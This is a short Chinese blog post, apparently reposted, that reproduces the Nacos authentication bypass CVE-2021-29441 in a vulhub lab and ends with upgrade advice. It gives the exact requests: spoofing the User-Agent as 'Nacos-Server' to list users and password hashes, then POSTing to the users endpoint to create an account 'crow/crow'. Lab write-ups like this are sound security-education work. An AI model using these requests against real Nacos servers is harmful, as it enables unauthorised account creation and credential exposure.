nacos未授权访问漏洞复现
一、漏洞介绍
Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。
该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。并且利用这个未授权漏洞,攻击者可以获取到用户名密码等敏感信息。
影响版本: Nacos <= 2.0.0-ALPHA.1
漏洞编号:CVE-2021-29441
二、环境搭建
vulhuab搭建环境好后 访问http://ip:8848/nacos/#login
默认账户密码为:nacos/nacos
三、漏洞复现
1.查看账户
访问http://ip:8848/nacos/v1/auth/users?pageNo=1&pageSize=2并且修改user-agent为Nacos-Server
可以看到有nacos账户 密码为加盐后的密码。
2.创建账户
访问http://ip:8848/nacos/v1/auth/users?username=crow&password=crow
创建一个新账户名为crow 密码为crow
bp修改请求方式为post user-agent修改为Nacos-Server
成功创建新账户crow。
登陆crow验证一下 可以登陆。
四、修复建议
升级nacos到最新版本。
转载:https://blog.csdn.net/csdnmmd/article/details/125905371
标签:crow,Nacos,agent,Server,漏洞,nacos,复现 From: https://www.cnblogs.com/thespace/p/16777691.html